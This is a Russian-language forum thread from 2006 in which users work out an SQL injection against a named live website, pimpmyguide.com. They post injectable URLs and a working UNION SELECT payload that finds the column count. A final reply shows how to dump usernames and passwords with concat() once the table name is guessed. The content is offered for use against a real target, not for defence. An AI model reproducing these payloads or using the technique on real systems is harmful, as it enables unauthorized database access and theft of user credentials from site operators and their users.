SQL инъекция на Pimpmyguide.com

Discussion in 'Уязвимости' started by Inviz, 30 May 2006.

  1. Inviz

    Inviz New Member

    Joined:
    30 May 2006
    Messages:
    4
    Likes Received:
    1
    Reputations:
    3
    Здрасьте.

    нашел багу на pimpmyguide.com (эксплойты для онлайн игр).

    _http://www.pimpmyguide.com/examine.php?id=5&tid=9

    Подвержены значения id и tid:

    _http://www.pimpmyguide.com/examine.php?id=5&tid=9 or tid=6 LIMIT 10--



    У самого опыта маловато, вообщем, попытался узнать, поддерживает ли сервер вложенные запросы

    _http://www.pimpmyguide.com/examine.php?id=5&tid=(SELECT 9) работает, а (SELECT 3+6) не работает :(

    Значит нет?

    _http://www.pimpmyguide.com/examine.php?id=5&tid=6 UNION SELECT null,null,null,null --

    - нулей пробовал кучу, все равно не хочет.

    Хочется контент получить,.. Кто нибудь может помочь?

    Спасибо.
     
    #1 Inviz, 30 May 2006
    Last edited: 30 May 2006
  2. ProblemaT2

    ProblemaT2 New Member

    Joined:
    31 Mar 2006
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    Держи
    http://www.pimpmyguide.com/examine.php?id=5&tid=9+union+select+1,2,3,4,char(116,101,115,116),6/*
     
    #2 ProblemaT2, 1 Jun 2006
  3. ~Fenix~

    ~Fenix~ Banned

    Joined:
    26 Jul 2005
    Messages:
    190
    Likes Received:
    50
    Reputations:
    6
    а смысл то с этого какой????
    можно узнать версию, ну тоже смысла мало, вобщем подбирай название таблицы и составь запрос типа такого
    _http://www.pimpmyguide.com/examine.php?id=1%20union%20select%201,2,3,4,concat(uname,char(58),passwd),6 from название_таблицы/* и читай статьи
     
    #3 ~Fenix~, 4 Jul 2006
    Last edited: 4 Jul 2006
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.